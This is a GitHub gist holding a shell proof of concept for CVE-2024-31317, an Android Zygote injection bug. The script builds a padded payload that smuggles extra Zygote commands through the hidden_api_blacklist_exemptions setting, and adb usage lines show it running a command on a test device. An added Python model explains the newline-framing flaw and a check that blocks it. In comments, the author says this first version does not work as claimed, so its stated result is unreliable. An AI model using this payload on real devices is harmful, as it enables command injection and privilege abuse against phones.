@rabits
Created July 3, 2024 03:40
CVE-2024-31317 PoC 1
#!/bin/sh
# PoC prepares the payload of commands to execute through the zygote injection CVE-2024-31317:
# https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html
#
# Tested on honor-magic-v2_ver-n49; Build 7.2.0.108(C636E1R2P2); Sec patch Dec 1, 2023
#
# USAGE (Android 13; on pre-13 builds pass 12200 instead of 32768 as the second argument)
# host$ adb push payload.sh /sdcard/
# host$ adb shell
# shell$ settings put global hidden_api_blacklist_exemptions "$(sh /sdcard/payload.sh 8192 32768 sh -c 'sleep 200')"
# [disconnect (zygote crash)]
# host$ adb shell
# shell$ ps -A | grep sleep
# root 480 2 0 0 0 0 S [adspsleepmon-wo]
# root 20055 19988 11122152 3792 0 0 S sleep
#
# Arguments: <buffer_size> <zygote_read_abort_size> <cmd> [args...]

buffer_size=$1            # length of the first filler line (8192 in the usage above)
shift
zygote_read_abort_size=$1 # total size the output is padded up to (32768, or 12200 pre-13)
shift
cmd_len=$#                # number of lines the injected command occupies: cmd plus its args
cmd="$1"
shift

# Bytes assumed to be sent ahead of our value on the zygote socket; their length is
# subtracted from the padding so the filler line ends on the intended boundary.
prefix="6 --set-api-denylist-exemptions "
prefix_len=$(printf '%s' "$prefix" | wc -c)

# Filler: five empty lines, then a line of buffer_size - prefix_len - 1 bytes made of
# 'A' (left padding turned into 'A' by tr) that ends with the argument count.
add_chars=$(($buffer_size - $prefix_len - 1))
payload=$(printf "\n\n\n\n\n%${add_chars}s" "$cmd_len" | tr ' ' A)
echo   # leading empty line before the payload

# One line per argument, then the command name itself; the separators are literal
# "\n" sequences that printf '%b' expands (mksh's echo would too, bash's would not).
for arg in "$@"; do
    payload="$payload\n$arg"
done
payload="$payload\n$cmd"
printf '%b\n' "$payload"

# Pad with commas up to zygote_read_abort_size, then terminate with X.
payload_len=$(printf '%b\n' "$payload" | wc -c)
add_chars=$(($zygote_read_abort_size - ($prefix_len + $payload_len)))
printf "%${add_chars}s" ',' | tr ' ' ','
echo X
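The script above depends on one primitive: the zygote command socket carries a count line followed by one argument per line, so a setting value that embeds newlines turns into extra lines on the wire. The model below is added here as an illustration; it is not the gist's code and not Android's ZygoteProcess/ZygoteConnection code. The framing format, the comma split of the setting value and every name in the block are assumptions, and the buffer-boundary alignment the script pads for is deliberately not modelled. It shows a two-argument exemptions command parsing as two commands on the receiving side once the exemption string contains '\n', and the check that refuses such an argument before it is framed.

```python
# Added example (not code from the gist or from Android): a minimal model of a
# count-prefixed, newline-delimited command framing, to show why an exemption
# string containing '\n' is an argument-injection primitive.
#
# Assumptions (mine, not from the page): a command is an argument count on the
# first line followed by one argument per line; the exemptions setting value is
# split on ',' before being sent; option names are placeholders.

from typing import List


class FramingError(ValueError):
    """Raised when a command cannot be serialised or parsed cleanly."""


def frame_command(args: List[str]) -> str:
    """Serialise a command as '<count>\\n<arg>\\n<arg>\\n...' (modelled format)."""
    return f"{len(args)}\n" + "".join(f"{a}\n" for a in args)


def frame_command_checked(args: List[str]) -> str:
    """Hardened variant: refuse any argument that would span a line boundary."""
    for a in args:
        if "\n" in a:
            raise FramingError(f"embedded newline in argument {a!r}")
    return frame_command(args)


def parse_commands(stream: str) -> List[List[str]]:
    """Parse back-to-back commands out of a stream the way a line-oriented
    server reader would: read a count line, then that many argument lines,
    then start the next command wherever the reader stopped."""
    lines = stream.split("\n")
    if lines and lines[-1] == "":
        lines.pop()  # trailing newline terminates the last line, not a new one
    commands: List[List[str]] = []
    pos = 0
    while pos < len(lines):
        try:
            count = int(lines[pos])
        except ValueError as exc:
            raise FramingError(f"bad count line {lines[pos]!r}") from exc
        body = lines[pos + 1 : pos + 1 + count]
        if len(body) != count:
            raise FramingError("truncated command")
        commands.append(body)
        pos += 1 + count
    return commands


def exemptions_command(setting_value: str) -> List[str]:
    """Client-side argument list for the exemptions command, built from the raw
    setting value (split on ',' as modelled above)."""
    return ["--set-api-denylist-exemptions"] + setting_value.split(",")


def is_rejected(setting_value: str) -> bool:
    """True if the hardened framing refuses this setting value."""
    try:
        frame_command_checked(exemptions_command(setting_value))
    except FramingError:
        return True
    return False


def demo() -> List[List[str]]:
    """A benign value frames as one command; a value with '\\n' parses as two."""
    benign = exemptions_command("Lcom/example/A;->f()V,Lcom/example/B;->g()V")
    assert parse_commands(frame_command(benign)) == [benign]

    # Constructed attacker value: the first line is a harmless exemption, the
    # rest spells out a second command (count '2') the client never intended.
    hostile = exemptions_command(
        "Lcom/example/A;->f()V\n2\n--injected-arg\n--another-injected-arg"
    )
    # The client framed ONE command with two arguments; the reader sees two commands.
    return parse_commands(frame_command(hostile))


if __name__ == "__main__":
    for i, cmd in enumerate(demo(), 1):
        print(f"command {i}: {cmd}")
    print("hardened framing rejects it:", is_rejected("x\ny"))
```

The reader in `parse_commands` never re-synchronises after a count line, which is the property the script's padding arithmetic is trying to exploit: whatever follows the bytes the legitimate command consumed is parsed as a fresh command with whatever count the attacker placed there.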
@diabl0w commented Sep 7, 2024

> Hi @diabl0w, this is the first iteration (PoC1); it works not as I expected. Better check the second one via the link above. In this one I thought that the sh sleep was actually caused by my payload, but no, it's caused by some init scripts of Android itself...

Okay, thanks for the clarification, I figured that might've been the case... okay, I'll have to try out the v2 and see what I can come up with.

@rabits (author) commented Sep 7, 2024


I think the issue is mostly in timings: the legitimate app needs to be transferred to zygote at the time the impostor gets back to system to steal its binding. But I was unable to get to this point...
